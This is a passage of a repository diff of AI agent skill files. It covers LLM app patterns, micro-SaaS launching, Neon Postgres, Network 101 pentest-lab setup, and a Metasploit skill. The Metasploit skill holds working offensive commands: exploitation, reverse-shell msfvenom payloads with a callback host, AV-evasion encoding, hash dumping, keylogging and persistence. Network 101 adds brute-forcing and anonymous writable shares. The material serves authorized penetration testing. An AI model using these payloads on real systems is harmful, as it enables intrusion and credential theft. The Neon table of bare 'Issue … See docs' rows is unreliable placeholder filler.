        if kwargs.get("temperature", 1.0) == 0:
            self.redis.setex(key, self.ttl, response)

        return response
```
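The cache key must be stable across processes and insensitive to keyword-argument ordering, which is why the scheme uses `json.dumps(..., sort_keys=True)` plus sha256. A quick check of those properties in isolation:

```python
import hashlib
import json

def cache_key(prompt: str, model: str, **kwargs) -> str:
    """Same scheme as LLMCache._cache_key, as a standalone function."""
    content = f"{model}:{prompt}:{json.dumps(kwargs, sort_keys=True)}"
    return hashlib.sha256(content.encode()).hexdigest()
```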
### 5.2 Rate Limiting & Retry

```python
import time
from tenacity import retry, retry_if_exception_type, wait_exponential, stop_after_attempt

class RateLimiter:
    def __init__(self, requests_per_minute: int):
        self.rpm = requests_per_minute
        self.timestamps = []

    def acquire(self):
        """Wait if rate limit would be exceeded"""
        now = time.time()

        # Remove timestamps older than the 60-second window
        self.timestamps = [t for t in self.timestamps if now - t < 60]

        if len(self.timestamps) >= self.rpm:
            sleep_time = 60 - (now - self.timestamps[0])
            time.sleep(sleep_time)

        self.timestamps.append(time.time())

# Retry with exponential backoff.
# Note: tenacity retries on every exception unless told otherwise, so mark
# retryable failures explicitly (RetryableError is a local marker class).
class RetryableError(Exception):
    pass

@retry(
    retry=retry_if_exception_type(RetryableError),
    wait=wait_exponential(multiplier=1, min=4, max=60),
    stop=stop_after_attempt(5)
)
def call_llm_with_retry(prompt: str) -> str:
    try:
        return llm.generate(prompt)
    except RateLimitError as e:
        raise RetryableError from e      # Retry rate limits
    except APIError as e:
        if e.status_code >= 500:
            raise RetryableError from e  # Retry server errors
        raise                            # Don't retry client errors
```
### 5.3 Fallback Strategy

```python
class LLMWithFallback:
    def __init__(self, primary: str, fallbacks: list[str]):
        self.primary = primary
        self.fallbacks = fallbacks

    def generate(self, prompt: str, **kwargs) -> str:
        models = [self.primary] + self.fallbacks

        for model in models:
            try:
                return llm.generate(prompt, model=model, **kwargs)
            except (RateLimitError, APIError) as e:
                logging.warning(f"Model {model} failed: {e}")
                continue

        raise AllModelsFailedError("All models exhausted")

# Usage
llm_client = LLMWithFallback(
    primary="gpt-4-turbo",
    fallbacks=["gpt-3.5-turbo", "claude-3-sonnet"]
)
```
---

## Architecture Decision Matrix

| Pattern              | Use When         | Complexity | Cost      |
| :------------------- | :--------------- | :--------- | :-------- |
| **Simple RAG**       | FAQ, docs search | Low        | Low       |
| **Hybrid RAG**       | Mixed queries    | Medium     | Medium    |
| **ReAct Agent**      | Multi-step tasks | Medium     | Medium    |
| **Function Calling** | Structured tools | Low        | Low       |
| **Plan-Execute**     | Complex tasks    | High       | High      |
| **Multi-Agent**      | Research tasks   | Very High  | Very High |

---

## Resources

- [Dify Platform](https://github.com/langgenius/dify)
- [LangChain Docs](https://python.langchain.com/)
- [LlamaIndex](https://www.llamaindex.ai/)
- [Anthropic Cookbook](https://github.com/anthropics/anthropic-cookbook)

475 skills/metasploit-framework/SKILL.md — Normal file
@@ -0,0 +1,475 @@
---
name: Metasploit Framework
description: This skill should be used when the user asks to "use Metasploit for penetration testing", "exploit vulnerabilities with msfconsole", "create payloads with msfvenom", "perform post-exploitation", "use auxiliary modules for scanning", or "develop custom exploits". It provides comprehensive guidance for leveraging the Metasploit Framework in security assessments.
---

# Metasploit Framework

## Purpose

Leverage the Metasploit Framework for comprehensive penetration testing, from initial exploitation through post-exploitation activities. Metasploit provides a unified platform for vulnerability exploitation, payload generation, auxiliary scanning, and maintaining access to compromised systems during authorized security assessments.

## Prerequisites
### Required Tools

```bash
# Metasploit comes pre-installed on Kali Linux
# For other systems:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall

# Start PostgreSQL for database support
sudo systemctl start postgresql
sudo msfdb init
```
### Required Knowledge

- Network and system fundamentals
- Understanding of vulnerabilities and exploits
- Basic programming concepts
- Target enumeration techniques

### Required Access

- Written authorization for testing
- Network access to target systems
- Understanding of scope and rules of engagement

## Outputs and Deliverables

1. **Exploitation Evidence** - Screenshots and logs of successful compromises
2. **Session Logs** - Command history and extracted data
3. **Vulnerability Mapping** - Exploited vulnerabilities with CVE references
4. **Post-Exploitation Artifacts** - Credentials, files, and system information

## Core Workflow
### Phase 1: MSFConsole Basics

Launch and navigate the Metasploit console:

```bash
# Start msfconsole
msfconsole

# Quiet mode (skip banner)
msfconsole -q

# Basic navigation commands
msf6 > help                  # Show all commands
msf6 > search [term]         # Search modules
msf6 > use [module]          # Select module
msf6 > info                  # Show module details
msf6 > show options          # Display required options
msf6 > set [OPTION] [value]  # Configure option
msf6 > run / exploit         # Execute module
msf6 > back                  # Return to main console
msf6 > exit                  # Exit msfconsole
```
### Phase 2: Module Types

Understand the different module categories:

```bash
# 1. Exploit Modules - Target specific vulnerabilities
msf6 > show exploits
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# 2. Payload Modules - Code executed after exploitation
msf6 > show payloads
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp

# 3. Auxiliary Modules - Scanning, fuzzing, enumeration
msf6 > show auxiliary
msf6 > use auxiliary/scanner/smb/smb_version

# 4. Post-Exploitation Modules - Actions after compromise
msf6 > show post
msf6 > use post/windows/gather/hashdump

# 5. Encoders - Obfuscate payloads
msf6 > show encoders
msf6 > set ENCODER x86/shikata_ga_nai

# 6. Nops - No-operation padding for buffer overflows
msf6 > show nops

# 7. Evasion - Bypass security controls
msf6 > show evasion
```
### Phase 3: Searching for Modules

Find appropriate modules for targets:

```bash
# Search by name
msf6 > search eternalblue

# Search by CVE
msf6 > search cve:2017-0144

# Search by platform
msf6 > search platform:windows type:exploit

# Search by type and keyword
msf6 > search type:auxiliary smb

# Filter by rank (excellent, great, good, normal, average, low, manual)
msf6 > search rank:excellent

# Combined search
msf6 > search type:exploit platform:linux apache

# Search result columns:
# Name, Disclosure Date, Rank, Check (whether it can verify the vulnerability), Description
```
### Phase 4: Configuring Exploits

Set up an exploit for execution:

```bash
# Select exploit module
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# View required options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

# Set target host
msf6 exploit(...) > set RHOSTS 192.168.1.100

# Set target port (if different from default)
msf6 exploit(...) > set RPORT 445

# View compatible payloads
msf6 exploit(...) > show payloads

# Set payload
msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Set local host for reverse connection
msf6 exploit(...) > set LHOST 192.168.1.50
msf6 exploit(...) > set LPORT 4444

# View all options again to verify
msf6 exploit(...) > show options

# Check if target is vulnerable (if supported)
msf6 exploit(...) > check

# Execute exploit
msf6 exploit(...) > exploit
# or
msf6 exploit(...) > run
```
### Phase 5: Payload Types

Select the appropriate payload for the situation:

```bash
# Singles - Self-contained, no staging
windows/shell_reverse_tcp
linux/x86/shell_bind_tcp

# Stagers - Small payload that downloads the larger stage
windows/meterpreter/reverse_tcp
linux/x86/meterpreter/bind_tcp

# Stages - Downloaded by the stager, provides full functionality
# Meterpreter, VNC, shell

# Payload naming convention:
# [platform]/[architecture]/[payload_type]/[connection_type]
# Examples:
windows/x64/meterpreter/reverse_tcp
linux/x86/shell/bind_tcp
php/meterpreter/reverse_tcp
java/meterpreter/reverse_https
android/meterpreter/reverse_tcp
```
### Phase 6: Meterpreter Session

Work with Meterpreter post-exploitation:

```bash
# After successful exploitation, you get the Meterpreter prompt
meterpreter >

# System Information
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid

# File System Operations
meterpreter > pwd
meterpreter > ls
meterpreter > cd C:\\Users
meterpreter > download file.txt /tmp/
meterpreter > upload /tmp/tool.exe C:\\

# Process Management
meterpreter > ps
meterpreter > migrate [PID]
meterpreter > kill [PID]

# Networking
meterpreter > ipconfig
meterpreter > netstat
meterpreter > route
meterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.1

# Privilege Escalation
meterpreter > getsystem
meterpreter > getprivs

# Credential Harvesting
meterpreter > hashdump
meterpreter > run post/windows/gather/credentials/credential_collector

# Screenshots and Keylogging
meterpreter > screenshot
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

# Shell Access
meterpreter > shell
C:\Windows\system32> whoami
C:\Windows\system32> exit
meterpreter >

# Background Session
meterpreter > background
msf6 exploit(...) > sessions -l
msf6 exploit(...) > sessions -i 1
```
### Phase 7: Auxiliary Modules

Use auxiliary modules for reconnaissance:

```bash
# SMB Version Scanner
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(...) > run

# Port Scanner
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > set PORTS 1-1000
msf6 auxiliary(...) > run

# SSH Version Scanner
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(...) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(...) > run

# FTP Anonymous Login
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > run

# HTTP Directory Scanner
msf6 > use auxiliary/scanner/http/dir_scanner
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > run

# Brute Force Modules
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > set USER_FILE /usr/share/wordlists/users.txt
msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 auxiliary(...) > run
```
### Phase 8: Post-Exploitation Modules

Run post modules on active sessions:

```bash
# List sessions
msf6 > sessions -l

# Run post module on a specific session
msf6 > use post/windows/gather/hashdump
msf6 post(windows/gather/hashdump) > set SESSION 1
msf6 post(...) > run

# Or run directly from Meterpreter
meterpreter > run post/windows/gather/hashdump

# Common Post Modules
# Credential Gathering
post/windows/gather/credentials/credential_collector
post/windows/gather/lsa_secrets
post/windows/gather/cachedump
post/multi/gather/ssh_creds

# System Enumeration
post/windows/gather/enum_applications
post/windows/gather/enum_logged_on_users
post/windows/gather/enum_shares
post/linux/gather/enum_configs

# Privilege Escalation
post/windows/escalate/getsystem
post/multi/recon/local_exploit_suggester

# Persistence
post/windows/manage/persistence_exe
post/linux/manage/sshkey_persistence

# Pivoting
post/multi/manage/autoroute
```
### Phase 9: Payload Generation with msfvenom

Create standalone payloads:

```bash
# Basic Windows reverse shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe

# Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf

# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php

# Python reverse shell
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.py

# PowerShell payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f psh -o shell.ps1

# ASP web shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o shell.asp

# WAR file (Tomcat)
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o shell.war

# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o shell.apk

# Encoded payload (evade AV)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe

# List available formats
msfvenom --list formats

# List available encoders
msfvenom --list encoders
```
### Phase 10: Setting Up Handlers
|
||||
|
||||
Configure listener for incoming connections:
|
||||
|
||||
```bash
|
||||
# Manual handler setup
|
||||
msf6 > use exploit/multi/handler
|
||||
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(multi/handler) > set LHOST 192.168.1.50
|
||||
msf6 exploit(multi/handler) > set LPORT 4444
|
||||
msf6 exploit(multi/handler) > exploit -j
|
||||
|
||||
# The -j flag runs as background job
|
||||
msf6 > jobs -l
|
||||
|
||||
# When payload executes on target, session opens
|
||||
[*] Meterpreter session 1 opened
|
||||
|
||||
# Interact with session
|
||||
msf6 > sessions -i 1
|
||||
```
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### Essential MSFConsole Commands
|
||||
|
||||
| Command | Description |
|
||||
|---------|-------------|
|
||||
| `search [term]` | Search for modules |
|
||||
| `use [module]` | Select a module |
|
||||
| `info` | Display module information |
|
||||
| `show options` | Show configurable options |
|
||||
| `set [OPT] [val]` | Set option value |
|
||||
| `setg [OPT] [val]` | Set global option |
|
||||
| `run` / `exploit` | Execute module |
|
||||
| `check` | Verify target vulnerability |
|
||||
| `back` | Deselect module |
|
||||
| `sessions -l` | List active sessions |
|
||||
| `sessions -i [N]` | Interact with session |
|
||||
| `jobs -l` | List background jobs |
|
||||
| `db_nmap` | Run nmap with database |
|
||||
|
||||
### Meterpreter Essential Commands
|
||||
|
||||
| Command | Description |
|
||||
|---------|-------------|
|
||||
| `sysinfo` | System information |
|
||||
| `getuid` | Current user |
|
||||
| `getsystem` | Attempt privilege escalation |
|
||||
| `hashdump` | Dump password hashes |
|
||||
| `shell` | Drop to system shell |
|
||||
| `upload/download` | File transfer |
|
||||
| `screenshot` | Capture screen |
|
||||
| `keyscan_start` | Start keylogger |
|
||||
| `migrate [PID]` | Move to another process |
|
||||
| `background` | Background session |
|
||||
| `portfwd` | Port forwarding |
|
||||
|
||||
### Common Exploit Modules
|
||||
|
||||
```bash
|
||||
# Windows
|
||||
exploit/windows/smb/ms17_010_eternalblue
|
||||
exploit/windows/smb/ms08_067_netapi
|
||||
exploit/windows/http/iis_webdav_upload_asp
|
||||
exploit/windows/local/bypassuac
|
||||
|
||||
# Linux
|
||||
exploit/linux/ssh/sshexec
|
||||
exploit/linux/local/overlayfs_priv_esc
|
||||
exploit/multi/http/apache_mod_cgi_bash_env_exec
|
||||
|
||||
# Web Applications
|
||||
exploit/multi/http/tomcat_mgr_upload
|
||||
exploit/unix/webapp/wp_admin_shell_upload
|
||||
exploit/multi/http/jenkins_script_console
|
||||
```
|
||||
|
||||
## Constraints and Limitations
|
||||
|
||||
### Legal Requirements
|
||||
- Only use on systems you own or have written authorization to test
|
||||
- Document all testing activities
|
||||
- Follow rules of engagement
|
||||
- Report all findings to appropriate parties
|
||||
|
||||
### Technical Limitations
|
||||
- Modern AV/EDR may detect Metasploit payloads
|
||||
- Some exploits require specific target configurations
|
||||
- Firewall rules may block reverse connections
|
||||
- Not all exploits work on all target versions
|
||||
|
||||
### Operational Security
|
||||
- Use encrypted channels (reverse_https) when possible
|
||||
- Clean up artifacts after testing
|
||||
- Avoid detection by monitoring systems
|
||||
- Limit post-exploitation to agreed scope
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Issue | Solutions |
|
||||
|-------|-----------|
|
||||
| Database not connected | Run `sudo msfdb init`, start PostgreSQL, then `db_connect` |
|
||||
| Exploit fails/no session | Run `check`; verify payload architecture; check firewall; try different payloads |
|
||||
| Session dies immediately | Migrate to stable process; use stageless payload; check AV; use AutoRunScript |
|
||||
| Payload detected by AV | Use encoding `-e x86/shikata_ga_nai -i 10`; use evasion modules; custom templates |
|
||||
212
skills/micro-saas-launcher/SKILL.md
Normal file
@@ -0,0 +1,212 @@
---
name: micro-saas-launcher
description: "Expert in launching small, focused SaaS products fast - the indie hacker approach to building profitable software. Covers idea validation, MVP development, pricing, launch strategies, and growing to sustainable revenue. Ship in weeks, not months. Use when: micro saas, indie hacker, small saas, side project, saas mvp."
source: vibeship-spawner-skills (Apache 2.0)
---

# Micro-SaaS Launcher

**Role**: Micro-SaaS Launch Architect

You ship fast and iterate. You know the difference between a side project
and a business. You've seen what works in the indie hacker community. You
help people go from idea to paying customers in weeks, not years. You
focus on sustainable, profitable businesses - not unicorn hunting.

## Capabilities

- Micro-SaaS strategy
- MVP scoping
- Pricing strategies
- Launch playbooks
- Indie hacker patterns
- Solo founder tech stack
- Early traction
- SaaS metrics

## Patterns

### Idea Validation

Validating before building

**When to use**: When starting a micro-SaaS

```javascript
## Idea Validation

### The Validation Framework
| Question | How to Answer |
|----------|---------------|
| Problem exists? | Talk to 5+ potential users |
| People pay? | Pre-sell or find competitors |
| You can build? | Can MVP ship in 2 weeks? |
| You can reach them? | Distribution channel exists? |

### Quick Validation Methods
1. **Landing page test**
   - Build landing page
   - Drive traffic (ads, community)
   - Measure signups/interest

2. **Pre-sale**
   - Sell before building
   - "Join waitlist for 50% off"
   - If no sales, pivot

3. **Competitor check**
   - Competitors = validation
   - No competitors = maybe no market
   - Find gap you can fill

### Red Flags
- "Everyone needs this" (too broad)
- No clear buyer (who pays?)
- Requires marketplace dynamics
- Needs massive scale to work

### Green Flags
- Clear, specific pain point
- People already paying for alternatives
- You have domain expertise
- Distribution channel access
```

### MVP Speed Run

Ship an MVP in 2 weeks

**When to use**: When building the first version

```javascript
## MVP Speed Run

### The Stack (Solo-Founder Optimized)
| Component | Choice | Why |
|-----------|--------|-----|
| Frontend | Next.js | Full-stack, Vercel deploy |
| Backend | Next.js API / Supabase | Fast, scalable |
| Database | Supabase Postgres | Free tier, auth included |
| Auth | Supabase / Clerk | Don't build auth |
| Payments | Stripe | Industry standard |
| Email | Resend / Loops | Transactional + marketing |
| Hosting | Vercel | Free tier generous |

### Week 1: Core
```
Day 1-2: Auth + basic UI
Day 3-4: Core feature (one thing)
Day 5-6: Stripe integration
Day 7: Polish and bug fixes
```

### Week 2: Launch Ready
```
Day 1-2: Landing page
Day 3: Email flows (welcome, etc.)
Day 4: Legal (privacy, terms)
Day 5: Final testing
Day 6-7: Soft launch
```

### What to Skip in MVP
- Perfect design (good enough is fine)
- All features (one core feature only)
- Scale optimization (worry later)
- Custom auth (use a service)
- Multiple pricing tiers (start simple)
```

### Pricing Strategy

Pricing your micro-SaaS

**When to use**: When setting prices

```javascript
## Pricing Strategy

### Pricing Tiers for Micro-SaaS
| Strategy | Best For |
|----------|----------|
| Single price | Simple tools, clear value |
| Two tiers | Free/paid or Basic/Pro |
| Three tiers | Most SaaS (Good/Better/Best) |
| Usage-based | API products, variable use |

### Starting Price Framework
```
What's the alternative cost? (Competitor or manual work)
Your price = 20-50% of alternative cost

Example:
- Manual work takes 10 hours/month
- 10 hours × $50/hour = $500 value
- Price: $49-99/month
```

### Common Micro-SaaS Prices
| Type | Price Range |
|------|-------------|
| Simple tool | $9-29/month |
| Pro tool | $29-99/month |
| B2B tool | $49-299/month |
| Lifetime deal | 3-5x monthly |

### Pricing Mistakes
- Too cheap (undervalues, attracts bad customers)
- Too complex (confuses buyers)
- No free tier AND no trial (no way to try)
- Charging too late (validate with money early)
```

## Anti-Patterns

### ❌ Building in Secret

**Why bad**: No feedback loop.
Building wrong thing.
Wasted time.
Fear of shipping.

**Instead**: Launch ugly MVP.
Get feedback early.
Build in public.
Iterate based on users.

### ❌ Feature Creep

**Why bad**: Never ships.
Dilutes focus.
Confuses users.
Delays revenue.

**Instead**: One core feature first.
Ship, then iterate.
Let users tell you what's missing.
Say no to most requests.

### ❌ Pricing Too Low

**Why bad**: Undervalues your work.
Attracts price-sensitive customers.
Hard to run a business.
Can't afford growth.

**Instead**: Price for value, not time.
Start higher, discount if needed.
B2B can pay more.
Your time has value.

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Great product, no way to reach customers | high | Distribution First |
| Building for market that can't/won't pay | high | Market Selection |
| New signups leaving as fast as they come | high | Fixing Churn |
| Pricing page confuses potential customers | medium | Simple Pricing |

## Related Skills

Works well with: `landing-page-design`, `backend`, `stripe`, `seo`
56
skills/neon-postgres/SKILL.md
Normal file
@@ -0,0 +1,56 @@
---
name: neon-postgres
description: "Expert patterns for Neon serverless Postgres, branching, connection pooling, and Prisma/Drizzle integration. Use when: neon database, serverless postgres, database branching, neon postgres, postgres serverless."
source: vibeship-spawner-skills (Apache 2.0)
---

# Neon Postgres

## Patterns

### Prisma with Neon Connection

Configure Prisma for Neon with connection pooling.

Use two connection strings:

- DATABASE_URL: Pooled connection for Prisma Client
- DIRECT_URL: Direct connection for Prisma Migrate

The pooled connection uses PgBouncer and supports up to 10,000 connections.
A direct connection is required for migrations (DDL operations).
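In Prisma, this two-string setup maps onto the `url` and `directUrl` fields of the datasource block. A minimal config sketch (env var names follow the convention above; verify against current Prisma and Neon docs):

```prisma
datasource db {
  provider  = "postgresql"
  url       = env("DATABASE_URL")  // pooled endpoint, used by Prisma Client
  directUrl = env("DIRECT_URL")    // direct endpoint, used by Prisma Migrate
}
```

Neon's pooled endpoints are distinguished by a `-pooler` suffix in the hostname; the direct endpoint omits it.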
### Drizzle with Neon Serverless Driver

Use Drizzle ORM with Neon's serverless HTTP driver for
edge/serverless environments.

Two driver options:

- neon-http: Single queries over HTTP (fastest for one-off queries)
- neon-serverless: WebSocket for transactions and sessions
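The HTTP option can be wired up in a few lines. A sketch for the `neon-http` path (package and function names from the Drizzle/Neon integration docs; check them against current versions):

```typescript
// db.ts — Drizzle over Neon's HTTP driver; assumes DATABASE_URL is set.
import { neon } from "@neondatabase/serverless";
import { drizzle } from "drizzle-orm/neon-http";

const sql = neon(process.env.DATABASE_URL!);
export const db = drizzle(sql);

// For transactions and sessions, swap to the WebSocket driver instead:
// import { Pool } from "@neondatabase/serverless";
// import { drizzle } from "drizzle-orm/neon-serverless";
```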
### Connection Pooling with PgBouncer

Neon provides built-in connection pooling via PgBouncer.

Key limits:

- Up to 10,000 concurrent connections to the pooler
- Pooled connections still consume underlying Postgres connections
- 7 connections are reserved for the Neon superuser

Use the pooled endpoint for the application and the direct endpoint for migrations.

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | high | See docs |
| Issue | high | See docs |
| Issue | high | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | low | See docs |
| Issue | medium | See docs |
| Issue | high | See docs |
339
skills/network-101/SKILL.md
Normal file
@@ -0,0 +1,339 @@
---
name: Network 101
description: This skill should be used when the user asks to "set up a web server", "configure HTTP or HTTPS", "perform SNMP enumeration", "configure SMB shares", "test network services", or needs guidance on configuring and testing network services for penetration testing labs.
---

# Network 101

## Purpose

Configure and test common network services (HTTP, HTTPS, SNMP, SMB) for penetration testing lab environments. Enable hands-on practice with service enumeration, log analysis, and security testing against properly configured target systems.

## Inputs/Prerequisites

- Windows Server or Linux system for hosting services
- Kali Linux or similar for testing
- Administrative access to target system
- Basic networking knowledge (IP addressing, ports)
- Firewall access for port configuration

## Outputs/Deliverables

- Configured HTTP/HTTPS web server
- SNMP service with accessible communities
- SMB file shares with various permission levels
- Captured logs for analysis
- Documented enumeration results

## Core Workflow

### 1. Configure HTTP Server (Port 80)

Set up a basic HTTP web server for testing:

**Windows IIS Setup:**

1. Open IIS Manager (Internet Information Services)
2. Right-click Sites → Add Website
3. Configure site name and physical path
4. Bind to IP address and port 80

**Linux Apache Setup:**

```bash
# Install Apache
sudo apt update && sudo apt install apache2

# Start service
sudo systemctl start apache2
sudo systemctl enable apache2

# Create test page
echo "<html><body><h1>Test Page</h1></body></html>" | sudo tee /var/www/html/index.html

# Verify service
curl http://localhost
```

**Configure Firewall for HTTP:**

```bash
# Linux (UFW)
sudo ufw allow 80/tcp

# Windows PowerShell
New-NetFirewallRule -DisplayName "HTTP" -Direction Inbound -Protocol TCP -LocalPort 80 -Action Allow
```

### 2. Configure HTTPS Server (Port 443)

Set up secure HTTPS with SSL/TLS:

**Generate Self-Signed Certificate:**

```bash
# Linux - Generate certificate
sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
  -keyout /etc/ssl/private/apache-selfsigned.key \
  -out /etc/ssl/certs/apache-selfsigned.crt

# Enable SSL module
sudo a2enmod ssl
sudo systemctl restart apache2
```

**Configure Apache for HTTPS:**

```bash
# Edit SSL virtual host
sudo nano /etc/apache2/sites-available/default-ssl.conf

# Enable site
sudo a2ensite default-ssl
sudo systemctl reload apache2
```

**Verify HTTPS Setup:**

```bash
# Check port 443 is open
nmap -p 443 192.168.1.1

# Test SSL connection
openssl s_client -connect 192.168.1.1:443

# Check certificate
curl -kv https://192.168.1.1
```

### 3. Configure SNMP Service (Port 161)

Set up SNMP for enumeration practice:

**Linux SNMP Setup:**

```bash
# Install SNMP daemon
sudo apt install snmpd snmp

# Configure community strings
sudo nano /etc/snmp/snmpd.conf

# Add these lines:
# rocommunity public
# rwcommunity private

# Restart service
sudo systemctl restart snmpd
```

**Windows SNMP Setup:**

1. Open Server Manager → Add Features
2. Select SNMP Service
3. Configure community strings in Services → SNMP Service → Properties

**SNMP Enumeration Commands:**

```bash
# Basic SNMP walk
snmpwalk -c public -v1 192.168.1.1

# Enumerate system info
snmpwalk -c public -v1 192.168.1.1 1.3.6.1.2.1.1

# Get running processes
snmpwalk -c public -v1 192.168.1.1 1.3.6.1.2.1.25.4.2.1.2

# SNMP check tool
snmp-check 192.168.1.1 -c public

# Brute force community strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.1.1
```

### 4. Configure SMB Service (Port 445)

Set up SMB file shares for enumeration:

**Windows SMB Share:**

1. Create folder to share
2. Right-click → Properties → Sharing → Advanced Sharing
3. Enable sharing and set permissions
4. Configure NTFS permissions

**Linux Samba Setup:**

```bash
# Install Samba
sudo apt install samba

# Create share directory
sudo mkdir -p /srv/samba/share
sudo chmod 777 /srv/samba/share

# Configure Samba
sudo nano /etc/samba/smb.conf

# Add share:
# [public]
# path = /srv/samba/share
# browsable = yes
# guest ok = yes
# read only = no

# Restart service
sudo systemctl restart smbd
```

**SMB Enumeration Commands:**

```bash
# List shares anonymously
smbclient -L //192.168.1.1 -N

# Connect to share
smbclient //192.168.1.1/share -N

# Enumerate with smbmap
smbmap -H 192.168.1.1

# Full enumeration
enum4linux -a 192.168.1.1

# Check for vulnerabilities
nmap --script smb-vuln* 192.168.1.1
```
### 5. Analyze Service Logs

Review logs for security analysis:

**HTTP/HTTPS Logs:**

```bash
# Apache access log
sudo tail -f /var/log/apache2/access.log

# Apache error log
sudo tail -f /var/log/apache2/error.log

# Windows IIS logs
# Location: C:\inetpub\logs\LogFiles\W3SVC1\
```

**Parse Log for Credentials:**

```bash
# Search for POST requests
grep "POST" /var/log/apache2/access.log

# Extract user agents (the quoted sixth field in the combined log format)
awk -F'"' '{print $6}' /var/log/apache2/access.log | sort | uniq -c
```

## Quick Reference

### Essential Ports

| Service | Port | Protocol |
|---------|------|----------|
| HTTP | 80 | TCP |
| HTTPS | 443 | TCP |
| SNMP | 161 | UDP |
| SMB | 445 | TCP |
| NetBIOS | 137-139 | TCP/UDP |

### Service Verification Commands

```bash
# Check HTTP
curl -I http://target

# Check HTTPS
curl -kI https://target

# Check SNMP
snmpwalk -c public -v1 target

# Check SMB
smbclient -L //target -N
```

### Common Enumeration Tools

| Tool | Purpose |
|------|---------|
| nmap | Port scanning and scripts |
| nikto | Web vulnerability scanning |
| snmpwalk | SNMP enumeration |
| enum4linux | SMB/NetBIOS enumeration |
| smbclient | SMB connection |
| gobuster | Directory brute forcing |

## Constraints

- Self-signed certificates trigger browser warnings
- SNMP v1/v2c communities transmit in cleartext
- Anonymous SMB access is often disabled by default
- Firewall rules must allow inbound connections
- Lab environments should be isolated from production

## Examples

### Example 1: Complete HTTP Lab Setup

```bash
# Install and configure
sudo apt install apache2
sudo systemctl start apache2

# Create login page
cat << 'EOF' | sudo tee /var/www/html/login.html
<html>
<body>
<form method="POST" action="login.php">
Username: <input type="text" name="user"><br>
Password: <input type="password" name="pass"><br>
<input type="submit" value="Login">
</form>
</body>
</html>
EOF

# Allow through firewall
sudo ufw allow 80/tcp
```

### Example 2: SNMP Testing Setup

```bash
# Quick SNMP configuration
sudo apt install snmpd
echo "rocommunity public" | sudo tee -a /etc/snmp/snmpd.conf
sudo systemctl restart snmpd

# Test enumeration
snmpwalk -c public -v1 localhost
```

### Example 3: SMB Anonymous Access

```bash
# Configure anonymous share
sudo apt install samba
sudo mkdir /srv/samba/anonymous
sudo chmod 777 /srv/samba/anonymous

# Test access
smbclient //localhost/anonymous -N
```

## Troubleshooting

| Issue | Solution |
|-------|----------|
| Port not accessible | Check firewall rules (ufw, iptables, Windows Firewall) |
| Service not starting | Check logs with `journalctl -u service-name` |
| SNMP timeout | Verify UDP 161 is open, check community string |
| SMB access denied | Verify share permissions and user credentials |
| HTTPS certificate error | Accept self-signed cert or add to trusted store |
| Cannot connect remotely | Bind service to 0.0.0.0 instead of localhost |
56
skills/nextjs-supabase-auth/SKILL.md
Normal file
@@ -0,0 +1,56 @@
---
name: nextjs-supabase-auth
description: "Expert integration of Supabase Auth with Next.js App Router. Use when: supabase auth next, authentication next.js, login supabase, auth middleware, protected route."
source: vibeship-spawner-skills (Apache 2.0)
---

# Next.js + Supabase Auth

You are an expert in integrating Supabase Auth with the Next.js App Router.
You understand the server/client boundary and how to handle auth in middleware,
Server Components, Client Components, and Server Actions.

Your core principles:

1. Use @supabase/ssr for App Router integration
2. Handle tokens in middleware for protected routes
3. Never expose auth tokens to the client unnecessarily
4. Use Server Actions for auth operations when possible
5. Understand the cookie-based session flow

## Capabilities

- nextjs-auth
- supabase-auth-nextjs
- auth-middleware
- auth-callback

## Requirements

- nextjs-app-router
- supabase-backend

## Patterns

### Supabase Client Setup

Create properly configured Supabase clients for different contexts.
